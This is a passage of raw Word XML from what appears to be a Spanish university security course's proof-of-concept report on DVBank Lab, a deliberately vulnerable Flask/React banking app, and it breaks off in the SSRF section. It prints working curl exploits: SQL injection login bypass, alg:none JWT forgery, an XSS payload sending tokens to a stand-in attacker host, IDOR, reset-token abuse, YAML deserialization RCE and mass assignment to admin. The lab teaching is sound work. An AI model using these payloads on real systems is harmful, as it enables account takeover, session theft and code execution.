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Fase 2 - Documento de Pruebas de Concepto (PoC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Fase 2 — Documento de Pruebas de Concepto (PoC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proyecto Final IC-8071 Seguridad del Software · DVBank Lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Aplicación cliente-servidor: backend Flask (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/</w:t>
      </w:r>
      <w:r>
        <w:t>) + cliente React (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>frontend/</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Cada PoC se ejecutó contra el estado </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> del repositorio (commit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3cd3610</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, versión vulnerable), antes de la remediación de la Fase 3. Las credenciales de laboratorio son </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Dvbank#Demo2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (cuentas semilla; en el baseline original eran </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>password123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). El backend corre en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://localhost:5000</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cada módulo documenta los tres vectores exigidos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>**(1)** Explotación de software de servidores (inyección + escalación de privilegios),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>**(2)** Explotación de software en clientes (XSS),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>**(3)** Alteración de entrada de usuario y detección (CSRF / manipulación de</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>parámetros + audit poisoning).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Módulo 1 — Autenticación · Responsable: Jose Arrieta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Archivos: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/routes/auth_routes.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/auth.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/models.py</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Explotación de software de servidores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.a Inyección SQL en el login (OWASP A03)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>auth_routes.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (baseline) arma la consulta concatenando el usuario: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>query = f"SELECT * FROM user WHERE username = '{username}'"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploit — autenticación sin contraseña válida:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/login \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"username":"alice'"'"' -- ","password":"cualquiera"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comenta el resto; la fila de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se devuelve y el flujo emite un token de sesión de alice. También </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' -- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> recupera el primer usuario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Impacto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> acceso a cualquier cuenta sin conocer la contraseña; lectura de toda la tabla </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> combinando con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.b Escalación de privilegios — JWT inseguro (OWASP A01/A07)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>auth._decode_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> intenta verificar con el secreto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'secret'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y, si falla, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>re-decodifica sin verificar firma ni expiración aceptando `alg:none`</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploit — forjar un token de otro usuario (p. ej. user_id 1):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Cabecera y payload en base64url, firma vacía (alg:none)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python3 - &lt;&lt;'PY'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import base64,json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>def b(d): return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b'=').decode()</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>print(b({"alg":"none","typ":"JWT"})+"."+b({"user_id":1,"username":"alice"})+".")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PY</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Usar el token devuelto:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s http://localhost:5000/api/me -H "Authorization: Bearer &lt;TOKEN_SIN_FIRMA&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">El servidor acepta el token sin firma e identifica al usuario como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user_id=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Como el secreto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'secret'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> también está en el código, se puede firmar un token válido para cualquier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:r>
        <w:t>, incluido uno con rol admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Explotación de software en clientes (XSS) — robo de sesión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">El token se guarda en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y la cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>session_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se emite con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>httponly=False</w:t>
      </w:r>
      <w:r>
        <w:t>. Cualquier XSS en la aplicación (ver Módulo 2, búsqueda de admin) permite exfiltrar la sesión:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="fetch('https://atacante/'+encodeURIComponent(localStorage.getItem('token')+';'+document.cookie))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Como la cookie no es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la expone; el token en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> también es legible desde JS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Alteración de entrada y detección</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.a IDOR — cambio de contraseña de otro usuario (OWASP A01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/update-password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> toma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> del cuerpo y no pide la contraseña actual.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/update-password \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer &lt;TOKEN_DE_ALICE&gt;" -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"user_id":2,"new_password":"tomada123"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Alice cambia la contraseña de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user_id=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bob) → toma de cuenta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.b Token de recuperación predecible y expuesto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/forgot-password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> genera el token como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>md5(username)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y lo devuelve en la respuesta (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>debug_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), sin expiración; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reset-password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ni siquiera lo compara con el guardado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/forgot-password -H "Content-Type: application/json" -d '{"username":"bob"}'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># md5("bob") es calculable offline: python -c "import hashlib;print(hashlib.md5(b'bob').hexdigest())"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/reset-password -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"username":"bob","token":"&lt;md5_de_bob&gt;","new_password":"tomada123"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.c Deserialización YAML (RCE) — OWASP A08</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/profile/import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml.load(..., Loader=yaml.Loader)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/profile/import \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer &lt;TOKEN&gt;" -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"profile_yaml":"!!python/object/apply:os.system [\"id\"]"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ejecuta comandos del sistema en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Módulo 2 — Gestión de Usuarios · Responsable: Angie Aguilar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Archivos: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/routes/admin_routes.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (usuarios), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/routes/upload_routes.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>frontend/src/components/AdminPanel.js</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Explotación de software de servidores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.a Mass assignment → auto-escalada a admin (OWASP A08/A01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PUT /api/admin/users/&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setattr(user, key, value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sobre todo el cuerpo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X PUT http://localhost:5000/api/admin/users/1 \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer &lt;TOKEN_DE_ALICE&gt;" -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"role":"admin","balance":1000000}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Un usuario normal se asigna rol admin y saldo arbitrario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.b Broken access control + fuga de hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/admin/users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no exige rol admin y devuelve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de todos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s http://localhost:5000/api/admin/users -H "Authorization: Bearer &lt;TOKEN_NORMAL&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Devuelve los MD5 de todas las cuentas (crackeables offline).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.c SSRF (OWASP A10) y SSTI (A03)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
